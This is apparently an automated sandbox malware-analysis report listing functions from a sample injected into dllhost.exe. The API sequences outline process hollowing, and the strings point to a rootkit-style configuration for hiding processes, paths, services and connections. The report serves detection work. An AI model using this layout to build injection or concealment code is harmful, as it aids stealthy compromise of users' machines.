Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1

ExitProcess.KERNEL32 ref: 0000000140002D43

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
String ID:
API String ID: 3805535264-0
Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

Non-executed Functions

Function 0000000140002434 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 317injectionthreadmemoryCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 000000014000252A
VirtualAllocEx.KERNEL32 ref: 0000000140002581
WriteProcessMemory.KERNEL32 ref: 00000001400025A9
VirtualProtectEx.KERNEL32 ref: 00000001400025D4
WriteProcessMemory.KERNEL32 ref: 0000000140002613
VirtualProtectEx.KERNEL32 ref: 000000014000265D
VirtualAlloc.KERNEL32 ref: 0000000140002693
GetThreadContext.KERNEL32 ref: 00000001400026B6
WriteProcessMemory.KERNEL32 ref: 00000001400026E1
SetThreadContext.KERNEL32 ref: 0000000140002704
ResumeThread.KERNEL32 ref: 0000000140002717
VirtualAllocEx.KERNEL32 ref: 0000000140002759
WriteProcessMemory.KERNEL32 ref: 0000000140002781
VirtualProtectEx.KERNEL32 ref: 00000001400027AB
WriteProcessMemory.KERNEL32 ref: 00000001400027EA
VirtualProtectEx.KERNEL32 ref: 0000000140002834
VirtualAlloc.KERNEL32 ref: 0000000140002869
Wow64GetThreadContext.KERNEL32 ref: 0000000140002887
WriteProcessMemory.KERNEL32 ref: 00000001400028AC
Wow64SetThreadContext.KERNEL32 ref: 00000001400028CA
OpenProcess.KERNEL32 ref: 00000001400028E6
TerminateProcess.KERNEL32 ref: 00000001400028F6

Part of subcall function 00000001400020CC: GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020DC
Part of subcall function 00000001400020CC: GetProcAddress.KERNEL32(?,?,00000000,0000000140002C18), ref: 00000001400020EF

Strings

@, xrefs: 0000000140002751
h, xrefs: 00000001400024EE
RtlGetVersion, xrefs: 000000014000249B
NtUnmapViewOfSection, xrefs: 000000014000253C

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
API String ID: 1036100660-1371749706
Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04

Function 0000000140001274 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 136memoryregistrystringCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000001400012D1
GetProcessHeap.KERNEL32 ref: 00000001400012DF
HeapAlloc.KERNEL32 ref: 00000001400012F0
RegEnumValueW.ADVAPI32 ref: 000000014000134F
StrCmpIW.SHLWAPI ref: 0000000140001388
StrCmpW.SHLWAPI ref: 0000000140001390
GetProcessHeap.KERNEL32 ref: 00000001400013C7
HeapAlloc.KERNEL32 ref: 00000001400013D5
GetProcessHeap.KERNEL32 ref: 00000001400013F2
HeapFree.KERNEL32 ref: 0000000140001400
lstrlenW.KERNEL32 ref: 0000000140001409
GetProcessHeap.KERNEL32 ref: 0000000140001417
HeapAlloc.KERNEL32 ref: 0000000140001425
StrCpyW.SHLWAPI ref: 0000000140001447
GetProcessHeap.KERNEL32 ref: 000000014000145E
HeapFree.KERNEL32 ref: 000000014000146C

Strings

d, xrefs: 0000000140001312

Memory Dump Source

Source File: 00000025.00000002.2525914365.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000025.00000002.2525086326.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2526696098.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2527566343.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710

Function 00000279A9272FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00000279A9273094
lstrlenW.KERNEL32 ref: 00000279A92732BE

Part of subcall function 00000279A9271A30: OpenProcess.KERNEL32 ref: 00000279A9271A56
Part of subcall function 00000279A9271A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000279A9271A74
Part of subcall function 00000279A9271A30: PathFindFileNameW.SHLWAPI ref: 00000279A9271A83
Part of subcall function 00000279A9271A30: lstrlenW.KERNEL32 ref: 00000279A9271A8F
Part of subcall function 00000279A9271A30: StrCpyW.SHLWAPI ref: 00000279A9271AA2
Part of subcall function 00000279A9271A30: CloseHandle.KERNEL32 ref: 00000279A9271AB0

GetProcAddress.KERNEL32 ref: 00000279A92730A9

Part of subcall function 00000279A9273F88: StrCmpNIW.SHLWAPI(?,?,?,00000279A927272F), ref: 00000279A9273FA0

StrCmpNIW.SHLWAPI ref: 00000279A92730EC
lstrlenW.KERNEL32 ref: 00000279A9273214

Strings

NtQueryObject, xrefs: 00000279A927309F
\Device\Nsi, xrefs: 00000279A92730DF
ntdll.dll, xrefs: 00000279A927308D

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: 4ecb0336c81636058d33181dba2a60dac6b7f71b847be35678b181947af84d2e
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 8AB1A33221A7918AEB74DF25E448799A3A5F744BA4F569026EE0D73794DF35CDC0C340

Function 00000279A92A2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00000279A92A3094
lstrlenW.KERNEL32 ref: 00000279A92A32BE

Part of subcall function 00000279A92A1A30: OpenProcess.KERNEL32 ref: 00000279A92A1A56
Part of subcall function 00000279A92A1A30: K32GetModuleFileNameExW.KERNEL32 ref: 00000279A92A1A74
Part of subcall function 00000279A92A1A30: PathFindFileNameW.SHLWAPI ref: 00000279A92A1A83
Part of subcall function 00000279A92A1A30: lstrlenW.KERNEL32 ref: 00000279A92A1A8F
Part of subcall function 00000279A92A1A30: StrCpyW.SHLWAPI ref: 00000279A92A1AA2
Part of subcall function 00000279A92A1A30: CloseHandle.KERNEL32 ref: 00000279A92A1AB0

GetProcAddress.KERNEL32 ref: 00000279A92A30A9

Part of subcall function 00000279A92A3F88: StrCmpNIW.SHLWAPI(?,?,?,00000279A92A272F), ref: 00000279A92A3FA0

StrCmpNIW.SHLWAPI ref: 00000279A92A30EC
lstrlenW.KERNEL32 ref: 00000279A92A3214

Strings

NtQueryObject, xrefs: 00000279A92A309F
\Device\Nsi, xrefs: 00000279A92A30DF
ntdll.dll, xrefs: 00000279A92A308D

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: e9c1a1d1fb91d9bcc67582c924eee4dc52c3241cd64278691c7c27ab1b54eb05
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 3FB1BE2321A7918AEB78CF2AD4497A9A3A4F744BA4F165026EE0D53F98DF35CDC0C740

Function 00000279A92784B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000279A92784CC
RtlCaptureContext.NTDLL ref: 00000279A92784F9
RtlLookupFunctionEntry.NTDLL ref: 00000279A9278513
RtlVirtualUnwind.NTDLL ref: 00000279A9278554
IsDebuggerPresent.KERNEL32 ref: 00000279A92785A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000279A92785C5
UnhandledExceptionFilter.KERNEL32 ref: 00000279A92785D0

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 7b2edd68b2cf942dec85651d68f36e504893090945ed746985f584e6b9b7fa95
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 7231647621AB808AEB608F60E8947EE7374F784754F45802ADF4D57B99DF78C588C710

Function 00000279A92A84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000279A92A84CC
RtlCaptureContext.NTDLL ref: 00000279A92A84F9
RtlLookupFunctionEntry.NTDLL ref: 00000279A92A8513
RtlVirtualUnwind.NTDLL ref: 00000279A92A8554
IsDebuggerPresent.KERNEL32 ref: 00000279A92A85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 00000279A92A85C5
UnhandledExceptionFilter.KERNEL32 ref: 00000279A92A85D0

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 400e0a6dcedabddb45cfe6a8e65bc0d329bd527d01e78466e9062d12d5d02baa
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: E931507620AB808AEB648F60E8987ED73B4F784754F45442ADF4E4BB95DF78C588C710

Function 00000279A927CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000279A927CE0B
RtlLookupFunctionEntry.NTDLL ref: 00000279A927CE23
RtlVirtualUnwind.NTDLL ref: 00000279A927CE5E
IsDebuggerPresent.KERNEL32 ref: 00000279A927CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 00000279A927CEA1
UnhandledExceptionFilter.KERNEL32 ref: 00000279A927CEAC

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: fd25328669f3b301c127f384fb19632af64165c13a34a40e463e8603ebf3886e
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 82418E36219F808AEB60CF34E8487AE73A4F788764F514225EE9D47B99DF38C195CB00

Function 00000279A92ACD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000279A92ACE0B
RtlLookupFunctionEntry.NTDLL ref: 00000279A92ACE23
RtlVirtualUnwind.NTDLL ref: 00000279A92ACE5E
IsDebuggerPresent.KERNEL32 ref: 00000279A92ACE97
SetUnhandledExceptionFilter.KERNEL32 ref: 00000279A92ACEA1
UnhandledExceptionFilter.KERNEL32 ref: 00000279A92ACEAC

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: be42197ef7396032113a9b27482aec5978ccf30de4e2f4fc0517c9bef2e25208
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: D8414F37219F808AEB60CF25E8487AE73A4F788764F550115EE9D47B99DF38C595CB00

Function 00000279A927DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00000279A927DB99
FindNextFileW.KERNEL32 ref: 00000279A927DCCF
FindClose.KERNEL32 ref: 00000279A927DD0F
FindClose.KERNEL32 ref: 00000279A927DD3B

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 5463dafe268c8ce6a3f239741ffa6bab211b1c714c3692e53edf3d41bf42a82a
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: F3A1E52270E7814DFB20DB75A8883AD6BE1F781BB4F164115DE9D3BA99DA38C4C2C700

Function 00000279A92ADA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00000279A92ADB99
FindNextFileW.KERNEL32 ref: 00000279A92ADCCF
FindClose.KERNEL32 ref: 00000279A92ADD0F
FindClose.KERNEL32 ref: 00000279A92ADD3B

Memory Dump Source

Source File: 00000025.00000002.2550451868.00000279A92A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A92A0000, based on PE: true

Associated: 00000025.00000002.2549598650.00000279A92A0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2551511389.00000279A92B5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2552354910.00000279A92C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553180197.00000279A92C2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2553981338.00000279A92C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a92a0000_dllhost.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: cedc1d6cb2350a0d694990548625e4e6501e1838b357de6e4865c17ff5e30b88
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: A7A1D42370E7814DFB209B75A4883AD6BE1F781BB4F564115DE9D2BEA9DA38C4C2C700

Function 00000279A9271724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A927172F
HeapAlloc.KERNEL32 ref: 00000279A927173E

Part of subcall function 00000279A9271264: GetProcessHeap.KERNEL32 ref: 00000279A927126A
Part of subcall function 00000279A9271264: HeapAlloc.KERNEL32 ref: 00000279A9271279
Part of subcall function 00000279A9271264: GetProcessHeap.KERNEL32 ref: 00000279A9271293
Part of subcall function 00000279A9271264: HeapAlloc.KERNEL32 ref: 00000279A92712A4

Part of subcall function 00000279A9271000: GetProcessHeap.KERNEL32 ref: 00000279A9271006
Part of subcall function 00000279A9271000: HeapAlloc.KERNEL32 ref: 00000279A9271015
Part of subcall function 00000279A9271000: GetProcessHeap.KERNEL32 ref: 00000279A9271028
Part of subcall function 00000279A9271000: HeapAlloc.KERNEL32 ref: 00000279A9271037

RegOpenKeyExW.ADVAPI32 ref: 00000279A92717AE
RegOpenKeyExW.ADVAPI32 ref: 00000279A92717DB
RegCloseKey.ADVAPI32 ref: 00000279A92717F5
RegOpenKeyExW.ADVAPI32 ref: 00000279A9271815
RegCloseKey.ADVAPI32 ref: 00000279A9271830
RegOpenKeyExW.ADVAPI32 ref: 00000279A9271850
RegCloseKey.ADVAPI32 ref: 00000279A927186B
RegOpenKeyExW.ADVAPI32 ref: 00000279A927188B
RegCloseKey.ADVAPI32 ref: 00000279A92718A6
RegOpenKeyExW.ADVAPI32 ref: 00000279A92718C6
RegCloseKey.ADVAPI32 ref: 00000279A92718E1
RegOpenKeyExW.ADVAPI32 ref: 00000279A9271901
RegCloseKey.ADVAPI32 ref: 00000279A927191C
RegOpenKeyExW.ADVAPI32 ref: 00000279A927193C
RegCloseKey.ADVAPI32 ref: 00000279A9271957
RegOpenKeyExW.ADVAPI32 ref: 00000279A9271977
RegCloseKey.ADVAPI32 ref: 00000279A9271992
RegCloseKey.ADVAPI32 ref: 00000279A927199C

Part of subcall function 00000279A92712B8: RegQueryInfoKeyW.ADVAPI32 ref: 00000279A9271315
Part of subcall function 00000279A92712B8: GetProcessHeap.KERNEL32 ref: 00000279A9271323
Part of subcall function 00000279A92712B8: HeapAlloc.KERNEL32 ref: 00000279A9271334
Part of subcall function 00000279A92712B8: RegEnumValueW.ADVAPI32 ref: 00000279A9271393
Part of subcall function 00000279A92712B8: GetProcessHeap.KERNEL32 ref: 00000279A92713DB
Part of subcall function 00000279A92712B8: HeapAlloc.KERNEL32 ref: 00000279A92713E9
Part of subcall function 00000279A92712B8: GetProcessHeap.KERNEL32 ref: 00000279A9271406
Part of subcall function 00000279A92712B8: HeapFree.KERNEL32 ref: 00000279A9271414
Part of subcall function 00000279A92712B8: lstrlenW.KERNEL32 ref: 00000279A927141D
Part of subcall function 00000279A92712B8: GetProcessHeap.KERNEL32 ref: 00000279A927142B
Part of subcall function 00000279A92712B8: HeapAlloc.KERNEL32 ref: 00000279A9271439

Strings

tcp_remote, xrefs: 00000279A9271935
tcp_local, xrefs: 00000279A92718FA
udp, xrefs: 00000279A9271970
pid, xrefs: 00000279A927180E
startup, xrefs: 00000279A92717D1
process_names, xrefs: 00000279A9271849
paths, xrefs: 00000279A9271884
service_names, xrefs: 00000279A92718BF
SOFTWARE\$cnt-config, xrefs: 00000279A927178E

Memory Dump Source

Source File: 00000025.00000002.2545067305.00000279A9271000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000279A9270000, based on PE: true

Associated: 00000025.00000002.2544195957.00000279A9270000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546068946.00000279A9285000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2546983291.00000279A9290000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2547866832.00000279A9292000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000025.00000002.2548736405.00000279A9299000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_279a9270000_dllhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$cnt-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2609720707
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 547277f10f1676f6738e2e1c39527bcbc6ec91cbfc2cd81ada411b9411a39e93
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 3D712F3631AF5089EB10DF65E898A9D33A4FF89BA8F425121DD4D57B69EF38C484C340

Function 00000279A92A1724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000279A92A172F
HeapAlloc.KERNEL32 ref: 00000279A92A173E

Part of subcall function 00000279A92A1264: GetProcessHeap.KERNEL32 ref: 00000279A92A126A
Part of subcall function 00000279A92A1264: HeapAlloc.KERNEL32 ref: 00000279A92A1279
Part of subcall function 00000279A92A1264: GetProcessHeap.KERNEL32 ref: 00000279A92A1293
Part of subcall function 00000279A92A1264: HeapAlloc.KERNEL32 ref: 00000279A92A12A4

Part of subcall function 00000279A92A1000: GetProcessHeap.KERNEL32 ref: 00000279A92A1006
Part of subcall function 00000279A92A1000: HeapAlloc.KERNEL32 ref: 00000279A92A1015
Part of subcall function 00000279A92A1000: GetProcessHeap.KERNEL32 ref: 00000279A92A1028
Part of subcall function 00000279A92A1000: HeapAlloc.KERNEL32 ref: 00000279A92A1037

RegOpenKeyExW.ADVAPI32 ref: 00000279A92A17AE
RegOpenKeyExW.ADVAPI32 ref: 00000279A92A17DB
RegCloseKey.ADVAPI32 ref: 00000279A92A17F5
RegOpenKeyExW.ADVAPI32 ref: 00000279A92A1815
RegCloseKey.ADVAPI32 ref: 00000279A92A1830
RegOpenKeyExW.ADVAPI32 ref: 00000279A92A1850
RegCloseKey.ADVAPI32 ref: 00000279A92A186B
RegOpenKeyExW.ADVAPI32 ref: 00000279A92A188B
RegCloseKey.ADVAPI32 ref: 00000279A92A18A6
RegOpenKeyExW.ADVAPI32 ref: 00000279A92A18C6
RegCloseKey.ADVAPI32 ref: 00000279A92A18E1
RegOpenKeyExW.ADVAPI32 ref: 00000279A92A1901
RegCloseKey.ADVAPI32 ref: 00000279A92A191C
RegOpenKeyExW.ADVAPI32 ref: 00000279A92A193C
RegCloseKey.ADVAPI32 ref: 00000279A92A1957
RegOpenKeyExW.ADVAPI32 ref: 00000279A92A1977
RegCloseKey.ADVAPI32 ref: 00000279A92A1992
RegCloseKey.ADVAPI32 ref: 00000279A92A199C

